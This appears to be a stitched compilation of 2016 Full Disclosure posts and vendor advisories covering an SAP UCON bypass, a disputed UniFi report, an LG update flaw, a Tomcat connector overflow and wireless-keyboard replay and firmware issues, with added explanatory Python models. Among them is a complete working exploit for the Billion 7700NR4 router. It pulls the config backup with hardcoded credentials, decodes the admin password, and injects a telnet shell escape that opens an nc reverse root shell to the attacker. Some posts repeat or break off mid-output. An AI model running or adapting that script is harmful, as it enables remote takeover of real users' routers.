- CVE: CVE-2016-3635
- Researcher: Sergio Abraham and Pablo Müller
- Vendor Provided CVSS v2: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)
- Onapsis CVSS v2: 6.0 (AV:N/AC:M/Au:S/C:P/I:P/A:P)

3. Vulnerability Information
============================

- Vendor: SAP AG
- Affected Components: SAP NetWeaver 7.4
- Vulnerability Class: Improper Access Control (CWE-284)
- Remotely Exploitable: Yes
- Locally Exploitable: No
- Authentication Required: Yes
- Original Advisory: https://www.onapsis.com/research/security-advisories/sap-ucon-security-protection-bypass

4. Affected Components Description
==================================

In SAP, Remote Function Modules (RFMs) are used to execute remote functions in external systems. Access to them can be restricted by an allowlist that is managed through the Unified Connectivity (UCON) framework.

5. Vulnerability Details
========================

An authenticated user can execute RFMs that are filtered by the UCON access control list. Those RFMs are in the final phase of the UCON implementation and are not included in any Communication Assembly (CA), which means that no user, regardless of their privileges, should be able to execute them remotely.

The user first remotely executes an anonymous RFM that is included in a Communication Assembly (and therefore allowed by UCON). Over the same connection, the user then executes a second RFM that is filtered (not included in any Communication Assembly). The second call succeeds: the allowlist is effectively evaluated once per connection rather than for every call, so the user executes an RFM that UCON was meant to block and completely bypasses the access control list.

6. Solution
===========

Implement SAP Security Note 2139366.

7. Report Timeline
==================

- 03/03/2015: Onapsis provides vulnerability information to SAP AG.
- 03/05/2015: SAP AG confirms reception of vulnerability report.
- 03/10/2015: SAP reports fix is In Process.
- 04/14/2015: SAP reports fix is In Process.
- 05/12/2015: SAP reports fix is In Process.
- 06/09/2015: SAP reports fix is In Process.
- 06/09/2015: SAP releases SAP Security Note 2139366 fixing the vulnerability.
- 09/22/2016: Onapsis Releases Security Advisory.
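The sequence in section 5 of ONAPSIS-2016-002 is the general failure mode of an allowlist that is consulted when a connection is admitted instead of on every request. The Python model below is an added illustration and is not SAP's UCON implementation or any Onapsis code: the gateway classes, the `Connection` object and the allowlist of two RFM names are invented for it. `VulnerableGateway` filters only the first RFM seen on a connection; `FixedGateway` filters each call, and `attempt_bypass` replays the advisory's two-call sequence against both.

```python
"""Model of an RFM allowlist enforced per connection versus per call.

Added illustration for ONAPSIS-2016-002; the gateway logic, RFM names and
allowlist below are constructed and do not describe SAP's UCON internals."""
from __future__ import annotations

from dataclasses import dataclass, field

# Constructed allowlist: RFMs exposed through a Communication Assembly.
COMMUNICATION_ASSEMBLY = {"RFC_PING", "RFC_SYSTEM_INFO"}


class AccessDenied(Exception):
    """Raised when an RFM outside every Communication Assembly is requested."""


@dataclass
class Connection:
    user: str
    calls: list = field(default_factory=list)   # RFMs actually executed


def _dispatch(conn: Connection, rfm: str) -> str:
    """Stand-in for invoking the function module on the server."""
    conn.calls.append(rfm)
    return "%s executed for %s" % (rfm, conn.user)


class VulnerableGateway:
    """Evaluates the allowlist only for the first RFM on a connection; once
    the connection has been admitted every later RFM is dispatched."""

    def __init__(self):
        self._admitted = set()

    def call(self, conn: Connection, rfm: str) -> str:
        if id(conn) not in self._admitted:
            if rfm not in COMMUNICATION_ASSEMBLY:
                raise AccessDenied(rfm)
            self._admitted.add(id(conn))      # connection now "trusted"
        return _dispatch(conn, rfm)           # no per-call check here


class FixedGateway:
    """Evaluates the allowlist for every inbound RFM, regardless of what was
    already executed on the same connection."""

    def call(self, conn: Connection, rfm: str) -> str:
        if rfm not in COMMUNICATION_ASSEMBLY:
            raise AccessDenied(rfm)
        return _dispatch(conn, rfm)


def attempt_bypass(gateway) -> list:
    """The advisory's sequence: an allowed anonymous RFM, then a filtered RFM
    over the same connection. Returns the RFMs that actually executed."""
    conn = Connection(user="lowpriv")
    gateway.call(conn, "RFC_PING")                 # permitted by the CA
    try:
        gateway.call(conn, "RFC_FILTERED_RFM")     # must always be blocked
    except AccessDenied:
        pass
    return conn.calls


if __name__ == "__main__":
    print("vulnerable gateway executed:", attempt_bypass(VulnerableGateway()))
    print("fixed gateway executed:     ", attempt_bypass(FixedGateway()))
```

The detection angle follows from the model: if RFC call logging (gateway or security audit log) shows an RFM that is not in any Communication Assembly executing after an allowed one on the same connection, the per-connection check is what let it through.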
Re: [FD] Critical Vulnerability in Ubiquiti UniFi
The impression I get from Tim Pham's emails is that the 'Unify Manager' is doing some behind-the-scenes tunnelling, and bringing the Mongo interface from the server to the client (e.g. Mac or Windows device) and you are then able to connect to localhost (on the client) which tunnels through to the server.

However, after much searching, I am unable to locate this application. Googling insinuates that it is this (unreleased) software - https://www.ubnt.com/enterprise/software/

--Rob Thomas
Information Security, Sangoma Corporation

-----Original Message-----
From: Fulldisclosure [mailto:fulldisclosure-boun...@seclists.org] On Behalf Of Gregory Sloop
Sent: Wednesday, 5 October 2016 1:54 AM
To: Tim Schughart; fulldisclosure@seclists.org; bugt...@securityfocus.com; webapp...@securityfocus.com
Cc: Khanh Quoc. Pham
Subject: Re: [FD] Critical Vulnerability in Ubiquiti UniFi

I attempted private contact with Tim Pham and via email 12+ hours ago, but received no response since then.

I've spent some time trying to reproduce the reported vulnerability and have had no success. It certainly doesn't help that the steps to reproduce it are so poorly described or documented.

Without better documentation of the exploit, it seems impossible to determine if the report is just mis-informed, blatantly false, or if perhaps there's some step/process I don't understand or am missing.

In every attempt I've made the binding of MongoDB to 127.0.0.1 is effective and non-local connection attempts are refused, as one would expect.

A swift response from Prosec Networks [prosec-networks.com] would be most helpful.

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Billion Router 7700NR4 Remote Root Command Execution
# Title    : Billion Router 7700NR4 Remote Root Command Execution
# Date     : 06/10/2016
# Author   : R-73eN
# Tested on: Billion Router 7700NR4
# Vendor   : http://www.billion.com/
#
# Vulnerability Description:
# This router is widely used in Albania; a telecom provider gives it to home and
# business users. The router has hardcoded credentials which "cannot be changed"
# by a normal user. Those credentials do not give much access on their own, but
# because the backup endpoint is not properly protected we can use them to
# download the configuration backup and read the admin password from it. With
# that password we log in to the telnet server and use a shell escape to get a
# reverse root connection.
#
# Set host to the target and reverse_ip to your attacking IP.
#
# Fix:
# The only fix is hacking your router with this exploit, changing the
# credentials and disabling all the other services using iptables.

import base64
import socket
import time

import requests

host = ""            # target router
def_user = "user"    # hardcoded low-privilege credentials
def_pass = "user"
reverse_ip = ""      # attacker IP; run "nc -lvp 1337" there first

# Tag in backupsettings.conf that wraps the base64-encoded admin password.
# The tag name did not survive the mailing-list rendering of the original
# post; "AdminPassword" is assumed here and may need adjusting.
ADMIN_PASS_TAG = "AdminPassword"


def build_payload(attacker_ip):
    """Command line typed into the limited telnet shell. The original post
    chains commands after "ping ;" as the shell escape; the redirections of
    the nc backpipe ("0<backpipe | /bin/sh 1>backpipe") were stripped in that
    rendering and are restored here as the standard mknod/backpipe idiom."""
    return (
        'ping ;rm /tmp/backpipe;cd tmp;'
        'echo "mknod backpipe p && nc ' + attacker_ip +
        ' 1337 0<backpipe | /bin/sh 1>backpipe &" > /tmp/rev.sh;'
        'chmod +x rev.sh;sh /tmp/rev.sh &'
    )


def extract_admin_password(backup_text):
    """Pull the base64 admin password out of the downloaded backup."""
    encoded = backup_text.split("<%s>" % ADMIN_PASS_TAG)[1]
    encoded = encoded.split("</%s>" % ADMIN_PASS_TAG)[0]
    return base64.b64decode(encoded).decode("utf-8", "replace")


def execute_payload(password):
    print("[+] Please run nc -lvp 1337 and then press any key [+]")
    input()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, 23))
    s.recv(1024)                                   # login prompt
    s.send(b"admin\r")
    s.recv(1024)                                   # password prompt
    time.sleep(1)
    s.send(password.encode() + b"\r")
    time.sleep(1)
    s.recv(1024)                                   # CLI prompt
    s.send(build_payload(reverse_ip).encode() + b"\r")
    time.sleep(1)
    print("[+] If everything worked you should get a reverse shell [+]")
    print("[+] Warning: pressing any key will close the SHELL [+]")
    input()
    s.close()


def main():
    print("[+] InfoGen AL - Billion 7700NR4 remote root [+]")
    r = requests.get("http://" + host + "/backupsettings.conf",
                     auth=(def_user, def_pass))
    if r.status_code == 200:
        print("[+] Seems the exploit worked [+]")
        print("[+] Dumping data . . . [+]")
        admin_pass = extract_admin_password(r.text)
        print("[+] Admin password : " + admin_pass + " [+]")
        execute_payload(admin_pass)
    else:
        print("[-] Exploit Failed [-]")
    print("\n[+] https://www.infogen.al/ [+]\n\n")


if __name__ == "__main__":
    main()
[FD] BFS-SA-2016-004: LG PC Suite Insecure Update Mechanism
Vendor: LG, www.lg.com
Affected Products: LG PC Suite for Windows
Affected Version: <= 5.3.25.20150529 (Build 18212)
Severity: High
OVE ID: OVE-20161010-0007

The LG PC Suite update mechanism is vulnerable to a man-in-the-middle attack. By manipulating files transmitted over HTTP, an attacker can force the execution of arbitrary code on the target system. Code is executed with the privileges of the currently logged-on user.

LG will not provide software updates to address the issue because LG PC Suite has reached the end of its product life cycle.

The technical details as well as a possible mitigation are described in the full advisory at: https://labs.bluefrostsecurity.de/advisories/bfs-sa-2016-004/
[FD] [SECURITY] CVE-2016-6808 Apache Tomcat JK ISAPI Connector buffer overflow
CVE-2016-6808 Apache Tomcat JK ISAPI Connector buffer overflow

Severity: Moderate

Vendor: The Apache Software Foundation

Versions Affected:
- Apache Tomcat JK ISAPI Connector 1.2.0 to 1.2.41

Description:
The IIS/ISAPI specific code implements special handling when a virtual host is present. The virtual host name and the URI are concatenated to create a virtual host mapping rule. The length checks prior to writing to the target buffer for this rule did not take account of the length of the virtual host name, creating the potential for a buffer overflow. It is not known if this overflow is exploitable.

Mitigation:
Users of affected versions should apply one of the following mitigations:
- Upgrade to Apache Tomcat JK ISAPI Connector 1.2.42
- Where available, use IIS configuration to restrict the maximum URI length to 4095 - (the length of the longest virtual host name)

Credit:
This issue was discovered by The Apache Tomcat Security Team.

References:
[1] http://tomcat.apache.org/security-jk.html
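The advisory's mitigation figure, 4095 minus the longest virtual host name, follows directly from the shape of the bug: the check bounds the URI alone while the write is vhost plus URI. The following Python model is an added illustration, not mod_jk's C source; the 4096-byte rule buffer with one byte reserved for the terminating NUL and the "<vhost><uri>" rule layout are assumptions chosen so that the numbers line up with the advisory. `_write_rule` raises where C would silently write past the buffer, so the two check variants can be compared on the same input.

```python
"""Model of a URI-only length check in front of a vhost+URI buffer write
(added illustration of CVE-2016-6808; buffer size and rule layout assumed)."""

RULE_BUF = 4096          # assumed fixed C buffer, last byte for the NUL


class BufferOverflow(Exception):
    """Stands in for the memory corruption a real strcpy would cause."""


def _write_rule(vhost, uri):
    """Models the write into the fixed-size rule buffer."""
    rule = (vhost + uri).encode() + b"\0"
    if len(rule) > RULE_BUF:
        raise BufferOverflow("%d bytes into a %d-byte buffer" % (len(rule), RULE_BUF))
    return rule


def build_rule_vulnerable(vhost, uri):
    """Pre-1.2.42 shape: the length check forgets the vhost prefix."""
    if len(uri) > RULE_BUF - 1:
        raise ValueError("URI too long")
    return _write_rule(vhost, uri)


def build_rule_fixed(vhost, uri):
    """Check the length that will actually be written."""
    if len(vhost) + len(uri) > RULE_BUF - 1:
        raise ValueError("vhost + URI too long")
    return _write_rule(vhost, uri)


def max_uri_for_mitigation(longest_vhost):
    """IIS URI limit that keeps the unpatched check safe: 4095 minus the
    longest virtual host name configured on the server."""
    return RULE_BUF - 1 - len(longest_vhost)


if __name__ == "__main__":
    vhost = "www.example.com"                 # constructed
    uri = "/" + "A" * 4094                    # 4095 bytes: passes URI-only check
    for builder in (build_rule_vulnerable, build_rule_fixed):
        try:
            builder(vhost, uri)
            print(builder.__name__, "wrote rule")
        except (BufferOverflow, ValueError) as err:
            print(builder.__name__, "->", type(err).__name__, err)
    print("safe IIS maxUrl for", vhost, "=", max_uri_for_mitigation(vhost))
```

The mitigation value must be computed from the longest host name across every site IIS serves, not the one under test; a shorter name on the test site hides the overflow for longer names elsewhere.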
[FD] [SYSS-2016-043] Microsoft Wireless Desktop 2000 - Cryptographic Issues (CWE-310), Insufficient Protection against Replay Attacks
Advisory ID: SYSS-2016-043
Product: Microsoft Wireless Desktop 2000
Manufacturer: Microsoft
Affected Version(s): Ver. A
Tested Version(s): Ver. A
Vulnerability Type: Cryptographic Issues (CWE-310)
                    Insufficient Protection against Replay Attacks
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-05-19
Solution Date: -
Public Disclosure: 2016-10-05
CVE Reference: Not yet assigned
Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH)

Overview:

Microsoft Wireless Desktop 2000 is a wireless desktop set consisting of a mouse and a keyboard. The manufacturer describes the product as follows (see [1]):

"This keyboard features Advanced Encryption Standard (AES) technology, which is designed to help protect your information by encrypting your keystrokes. Each keyboard is permanently paired with its receiver at the factory - no key information is ever shared over the air."

Due to an insecure implementation of the encrypted data communication, the Microsoft Wireless Desktop 2000 keyboard is prone to replay attacks, with certain restrictions.

Vulnerability Details:

SySS GmbH found that the Microsoft Wireless Desktop 2000 keyboard is prone to replay attacks with some limitations. An attacker can sniff the AES-encrypted data packets of the 2.4 GHz radio communication sent by the keyboard to the receiver (USB dongle) and replay the recorded data, causing the same effect as the original communication.

According to SySS test results, the keyboard and its USB dongle implement a replay protection based on an incrementing packet counter. However, the window of packet counter values the receiver accepts is large enough to carry out a replay attack, provided that not too many data packets (further keystrokes) were sent between the attacker's recording and the playback.

A replay attack against the keyboard can, for example, be used to gain unauthorized access to a computer system operated with a vulnerable Microsoft Wireless Desktop 2000 keyboard. In this scenario, the attacker records the radio communication during a password-based user authentication of the victim, for instance during a login to the operating system or while unlocking a screen lock. At an opportune moment when the victim's computer is unattended, the attacker approaches it and replays the previously recorded AES-encrypted data for the password-based authentication, thereby gaining unauthorized access to the victim's system.

Proof of Concept (PoC):

SySS GmbH successfully performed a replay attack as described above using the USB radio dongle Crazyradio PA (see [2]) and a simple proof-of-concept software tool. The following output illustrates a replay attack with the recorded data packets for the word "test".

# python simple_replay.py
Simple nRF24 Replay Tool v0.1 by Matthias Deeg - SySS GmbH (c) 2016
[*] Configure radio
[*] Start recording. Press to stop recording ...
[+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Received data: 083816016234008e
[+] Received data: 083816016234008e
[+] Received data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Received data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4
[+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4
[+] Received data: 0838160164340088
[+] Received data: 0838160164340088
[+] Received data: 099816019703529705956290664c0cda94ab28b6
[+] Received data: 099816019703529705956290664c0cda94ab28b6
[+] Received data: 0998160168690f3817261c9e068577dd450a245a
[+] Received data: 0998160168690f3817261c9e068577dd450a245a
[+] Received data: 083816016634008a
[+] Received data: 083816016634008a
[+] Received data: 083816016634008a
[+] Received data: 083816016634008a
[+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4
[+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4
[+] Received data: 09981601f7612ae3b196b5767ab0a4dd615651e2
[+] Received data: 0838160168340084
[+] Received data: 0838160168340084
[+] Received data: 09981601db67b32134efa3fefd8b01efb124581d
[+] Received data: 09981601db67b32134efa3fefd8b01efb124581d
^C
[*] Stop recording
[*] Press to replay the recorded data packets or to quit ...
[+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
[+] Send data: 083816016234008e
[+] Send data: 083816016234008e
[+] Send data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Send data: 099816016ae20e05e28d725888c4ede685f918e7
[+] Send data:
[FD] [SYSS-2016-068] Fujitsu Wireless Keyboard Set LX901 - Cryptographic Issues (CWE-310), Missing Protection against Replay Attacks
Advisory ID: SYSS-2016-068
Product: Wireless Keyboard Set LX901
Manufacturer: Fujitsu
Affected Version(s): Model No. GK900
Tested Version(s): Model No. GK900
Vulnerability Type: Cryptographic Issues (CWE-310)
                    Missing Protection against Replay Attacks
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-07-07
Solution Date: -
Public Disclosure: 2016-10-05
CVE Reference: Not yet assigned
Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH)

Overview:

Fujitsu Wireless Keyboard Set LX901 is a wireless desktop set consisting of a mouse and a keyboard. The manufacturer describes the product as follows (see [1]):

"The Wireless Keyboard LX901 is a top of the line desktop solution for lifestyle orientated customers, who want only the best for their desk. This superb keyboard set offers ambitious users more functions, security and better features than a conventional interface device. It even includes 2.4 GHz technology and 128 AES encryption for security."

Due to an insecure implementation of the encrypted data communication, the wireless keyboard LX901 is vulnerable to replay attacks.

Vulnerability Details:

SySS GmbH found that the wireless keyboard Fujitsu LX901 is prone to replay attacks. An attacker can sniff the AES-encrypted data packets of the 2.4 GHz radio communication sent by the keyboard to the receiver (USB dongle) and replay the recorded data at will, causing the same effect as the original transmission. The attacker needs neither the key nor the plaintext: the receiver simply accepts the same encrypted packets a second time, so the weakness lies in the missing replay protection, not in AES itself.

A replay attack against the keyboard can, for example, be used to gain unauthorized access to a computer system that is operated with a vulnerable Fujitsu LX901 keyboard. In this attack scenario, an attacker records the radio communication during a password-based user authentication of the victim, for instance during a login to the operating system or while unlocking a screen lock. At an opportune moment when the victim's computer system is unattended, the attacker approaches the victim's computer, replays the previously recorded AES-encrypted data communication of the password-based user authentication and thereby gains unauthorized access to the victim's system.

Proof of Concept (PoC):

SySS GmbH could successfully perform a replay attack as described in the previous section using a software-defined radio in combination with the software tool GNU Radio Companion.

Solution:

According to information from the manufacturer Fujitsu, the reported security issue will currently not be fixed in affected products. The written statement in German from Fujitsu regarding this security issue is as follows:

"Vielen Dank für Ihre Informationen zu unserer Funktastatur. Wie Ihnen bereits mitgeteilt, halten wir das von Ihnen beschriebene Angriffsszenario bei unserer Tastatur aufgrund des verwendeten Funkprotokolls unter realen Bedingungen für nicht so einfach durchführbar. Wie erwähnt, verkaufen wir mit unserer Tastatur keine Sicherheitslösung, sondern eine Komfortlösung (ohne gravierende Sicherheitsnachteile wie bei unverschlüsselten Wireless-Tastaturen). In einem bereits geplanten Nachfolgeprodukt werden alle neuen Erkenntnisse zur sicheren Datenübertragung bei Funktastaturen einfließen."

The English translation of this statement is as follows:

"Thank you very much for your information about our wireless keyboard. As we have already pointed out, we believe that the described scenario is not easy to perform under real conditions due to the radio protocol used. As mentioned, our product is not destined to sell security, but convenience in the first place (without the security drawbacks of unencrypted wireless keyboards). Any new information and insights will be incorporated into the already planned successor product."

Disclosure Timeline:

2016-07-07: Vulnerability reported to manufacturer
2016-07-08: Manufacturer acknowledges e-mail with SySS security advisory
2016-08-02: E-mail from manufacturer requesting further information
2016-08-04: Provided further information to manufacturer via e-mail
2016-08-05: E-mail from manufacturer with further questions
2016-08-08: E-mail to manufacturer with answers to open questions
2016-08-12: E-mail from manufacturer with statement regarding the reported security issue
2016-10-05: Public release of the security advisory

References:

[1] Product website for Fujitsu Wireless Keyboard Set
    http://www.fujitsu.com/global/products/computing/peripheral/accessories/input-devices/keyboards/wl-keyboard-lx901.html
[2] SySS
[FD] [SYSS-2016-043] Microsoft Wireless Desktop 2000 - Cryptographic Issues (CWE-310), Insufficient Protection against Replay Attacks
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-043
Product: Microsoft Wireless Desktop 2000
Manufacturer: Microsoft
Affected Version(s): Ver. A
Tested Version(s): Ver. A
Vulnerability Type: Cryptographic Issues (CWE-310)
                    Insufficient Protection against Replay Attacks
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-05-19
Solution Date: -
Public Disclosure: 2016-10-05
CVE Reference: Not yet assigned
Authors of Advisory: Matthias Deeg and Gerhard Klostermeier (SySS GmbH)

Overview:

Microsoft Wireless Desktop 2000 is a wireless desktop set consisting of a mouse and a keyboard. The manufacturer describes the product as follows (see [1]):

"This keyboard features Advanced Encryption Standard (AES) technology, which is designed to help protect your information by encrypting your keystrokes. Each keyboard is permanently paired with its receiver at the factory - no key information is ever shared over the air."

Due to an insecure implementation of the encrypted data communication, the wireless keyboard Microsoft Wireless Desktop 2000 is prone to replay attacks, with certain restrictions.

Vulnerability Details:

SySS GmbH found that the Microsoft Wireless Desktop 2000 keyboard is prone to replay attacks with some limitations. An attacker can sniff the AES-encrypted data packets of the 2.4 GHz radio communication sent by the keyboard to the receiver (USB dongle) and replay the recorded data, causing the same effect as the original transmission.

According to the test results of SySS GmbH, the Microsoft Wireless Desktop 2000 keyboard and its USB dongle do implement a replay protection based on an incrementing packet counter. However, the window of counter values the dongle accepts is wide enough that a recording can still be replayed successfully, provided not too many further keystrokes (and thus counter increments) occurred between the attacker's recording and the playback. The protection therefore only limits the time an attacker has; it does not prevent the attack.

A replay attack against the keyboard can, for example, be used to gain unauthorized access to a computer system that is operated with a vulnerable Microsoft Wireless Desktop 2000 keyboard. In this attack scenario, an attacker records the radio communication during a password-based user authentication of the victim, for instance during a login to the operating system or while unlocking a screen lock. At an opportune moment when the victim's computer system is unattended, the attacker approaches the victim's computer, replays the previously recorded AES-encrypted data communication of the password-based user authentication and thereby gains unauthorized access to the victim's system.

Proof of Concept (PoC):

SySS GmbH could successfully perform a replay attack as described in the previous section using the USB radio dongle Crazyradio PA (see [2]) and a simple proof-of-concept software tool. The following output illustrates a replay attack with the recorded data packets for the word "test". Note that most frames appear twice in the capture and are sent twice again during playback.

    # python simple_replay.py
    Simple nRF24 Replay Tool v0.1 by Matthias Deeg - SySS GmbH (c) 2016

    [*] Configure radio
    [*] Start recording. Press <CTRL+C> to stop recording ...
    [+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
    [+] Received data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
    [+] Received data: 083816016234008e
    [+] Received data: 083816016234008e
    [+] Received data: 099816016ae20e05e28d725888c4ede685f918e7
    [+] Received data: 099816016ae20e05e28d725888c4ede685f918e7
    [+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4
    [+] Received data: 09981601896c8f035a7a800fcf0a5ba58be156e4
    [+] Received data: 0838160164340088
    [+] Received data: 0838160164340088
    [+] Received data: 099816019703529705956290664c0cda94ab28b6
    [+] Received data: 099816019703529705956290664c0cda94ab28b6
    [+] Received data: 0998160168690f3817261c9e068577dd450a245a
    [+] Received data: 0998160168690f3817261c9e068577dd450a245a
    [+] Received data: 083816016634008a
    [+] Received data: 083816016634008a
    [+] Received data: 083816016634008a
    [+] Received data: 083816016634008a
    [+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4
    [+] Received data: 09981601653e89ebf7499ce2b7f962e9da48c5f4
    [+] Received data: 09981601f7612ae3b196b5767ab0a4dd615651e2
    [+] Received data: 0838160168340084
    [+] Received data: 0838160168340084
    [+] Received data: 09981601db67b32134efa3fefd8b01efb124581d
    [+] Received data: 09981601db67b32134efa3fefd8b01efb124581d
    ^C
    [*] Stop recording
    [*] Press <ENTER> to replay the recorded data packets or <CTRL+C> to quit ...
    [+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
    [+] Send data: 099816019c49e8e3d7004fb2c6d1c999c5cdd0d6
    [+] Send data: 083816016234008e
    [+] Send data: 083816016234008e
    [+] Send data: 099816016ae20e05e28d725888c4ede685f918e7
    [+] Send data:
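The difference between the two keyboards on this page is only the size of the counter window: the Fujitsu LX901 (SYSS-2016-068) performs no replay check at all, the Microsoft Wireless Desktop 2000 checks a counter but tolerates stale values. The following Python models that receiver-side check and shows how many frames of a recorded password survive replay after a given number of intervening keystrokes. It is an added illustration, not SySS code and not the simple_replay.py tool whose output is shown above; the frame layout, the window parameter, the "x" filler keystrokes and every number in it are constructed for the model, not values measured from either device.

```python
"""Model of the replay check a wireless keyboard receiver applies.

Added example, not SySS or vendor code.  Only the behaviour is taken from
the advisories: no check (LX901), a counter check with a wide acceptance
window (Wireless Desktop 2000), and the strict check both should have had.
The frame format and all window sizes are invented for the model.
"""
from dataclasses import dataclass
from typing import List, Optional


@dataclass(frozen=True)
class Frame:
    counter: int    # per-frame counter the keyboard increments
    payload: bytes  # AES-encrypted keystroke; opaque to this model


class Keyboard:
    """Transmitter side: every keystroke goes out with the next counter."""

    def __init__(self) -> None:
        self.counter = 0

    def send(self, key: str) -> Frame:
        self.counter += 1
        # Stand-in for the real ciphertext; nothing here decrypts it.
        return Frame(self.counter, key.encode())


class Receiver:
    """Dongle side.  `window` is how far *behind* the highest counter seen
    a frame may lag and still be accepted.  None models no check at all,
    a large value a wide tolerance window, 0 a strictly increasing counter."""

    def __init__(self, window: Optional[int]) -> None:
        self.window = window
        self.highest = 0
        self.typed: List[bytes] = []  # what is delivered to the host

    def receive(self, f: Frame) -> bool:
        if self.window is None:               # LX901: nothing checked
            self.typed.append(f.payload)
            return True
        if f.counter > self.highest:          # normal forward progress
            self.highest = f.counter
            self.typed.append(f.payload)
            return True
        if self.highest - f.counter < self.window:
            # Weak point: a stale counter inside the window is accepted,
            # so a frame recorded earlier can be injected again.
            self.typed.append(f.payload)
            return True
        return False                          # too old: dropped


def replay_accepted(window: Optional[int], keystrokes_between: int,
                    secret: str = "test") -> int:
    """Record the victim typing `secret`, let `keystrokes_between` more keys
    pass, then replay the recording.  Returns how many replayed frames the
    dongle accepted; len(secret) means the password was typed again in full."""
    kb, rx = Keyboard(), Receiver(window)
    recording = [kb.send(c) for c in secret]  # attacker sniffs these
    for f in recording:
        rx.receive(f)
    for _ in range(keystrokes_between):       # victim keeps working
        rx.receive(kb.send("x"))
    return sum(rx.receive(f) for f in recording)  # attacker presses replay


if __name__ == "__main__":
    for win, between in [(None, 5000), (64, 10), (64, 61), (64, 100), (0, 0)]:
        n = replay_accepted(win, between)
        print(f"window={win!s:>4} keystrokes in between={between:>5} "
              f"-> {n} of 4 replayed frames accepted")
```

With no check every replayed frame is accepted regardless of how much was typed in between; with a window of 64 the replay works fully after 10 keystrokes, partially after 61 and not at all after 100, which is the "with certain restrictions" behaviour the advisory describes. The fix is the strict variant: accept only counters above the highest seen (at most tolerating an exact repeat of the last frame for link-layer retransmission, without delivering its keystroke twice), which drops a replayed recording no matter when it is played back.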
[FD] [SYSS-2016-033] Microsoft Wireless Desktop 2000 - Insufficient Protection of Code (Firmware) and Data (Cryptographic Key)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-033
Product: Microsoft Wireless Desktop 2000
Manufacturer: Microsoft
Affected Version(s): Ver. A
Tested Version(s): Ver. A
Vulnerability Type: Insufficient Protection of Code (Firmware) and Data (Cryptographic Key)
Risk Level: Medium
Solution Status: Open
Manufacturer Notification: 2016-04-22
Solution Date: -
Public Disclosure: 2016-10-05
CVE Reference: Not yet assigned
Authors of Advisory: Gerhard Klostermeier and Matthias Deeg (SySS GmbH)

Overview:

Microsoft Wireless Desktop 2000 is a wireless desktop set consisting of a mouse and a keyboard. The manufacturer describes the product as follows (see [1]):

"This keyboard features Advanced Encryption Standard (AES) technology, which is designed to help protect your information by encrypting your keystrokes. Each keyboard is permanently paired with its receiver at the factory - no key information is ever shared over the air."

Due to the insufficient protection of the flash memory of the keyboard and of the USB dongle, an attacker with physical access has read and write access to the firmware and the cryptographic key in use.

Vulnerability Details:

SySS GmbH found that the embedded flash memory of the wireless keyboard Microsoft Wireless Desktop 2000 and of the corresponding USB dongle can be read and written via the SPI interface of the transceivers used, the nRF24LE1H (keyboard) and the nRF24LU1+ (USB dongle), both of which contain an embedded microcontroller, because the flash memory is not protected by the read-back protection feature the chips offer (RDISMB - Read DISable Main Block). Thus, an attacker with physical access to the keyboard or the USB dongle can simply read and write the SPI-addressable code and data flash memory. Because the nRF24 transceiver versions used have one-time programmable memory, write access is limited in such a way that a set 1 bit can be changed to a 0 bit but not vice versa; a byte can therefore only be driven towards zero, and a byte that already reads 0x00 cannot be changed at all.

The AES cryptographic key used by the Microsoft Wireless Desktop 2000 keyboard and the corresponding USB dongle is accessible via the SPI interface on both devices. With read and write access to the code and data flash memory, an attacker can either extract the cryptographic key, for instance to perform further attacks against the wireless communication, or modify the firmware or the cryptographic key, within the limits imposed by the one-time programmable memory. The factory pairing quoted above keeps the key off the air, but it does not protect the key against someone who can borrow the keyboard or the dongle for a few minutes.

Proof of Concept (PoC):

SySS GmbH could successfully read the contents of the code and data flash memory of the Microsoft Wireless Desktop 2000 keyboard and of the USB dongle using the hardware tool Bus Pirate [2] in combination with the software tool nrfprog [3].

Solution:

SySS GmbH is not aware of a solution for this reported security vulnerability. For further information please contact the manufacturer.

Disclosure Timeline:

2016-04-22: Vulnerability reported to manufacturer
2016-04-23: Manufacturer acknowledges e-mail with SySS security advisory
2016-06-06: E-mail to manufacturer asking about the current status
2016-06-27: Another e-mail to manufacturer asking about the current status
2016-06-27: E-mail from manufacturer requesting further information
2016-06-28: Provided further information and PoC software tool
2016-07-07: E-mail from manufacturer with further information and question about intended disclosure
2016-07-08: E-mail to manufacturer concerning the planned responsible disclosure
2016-08-04: E-mail from manufacturer concerning limitations of actual attacks
2016-10-05: Public release of the security advisory

References:

[1] Product website for Microsoft Wireless Desktop 2000
    https://www.microsoft.com/accessories/en-us/products/keyboards/wireless-desktop-2000/m7j-1
[2] Website of Bus Pirate hardware tool
    http://dangerousprototypes.com/docs/Bus_Pirate
[3] nrfprog GitHub repository
    https://github.com/nekromant/nrfprog
[4] SySS Security Advisory SYSS-2016-033
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-033.txt
[5] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy/

Credits:

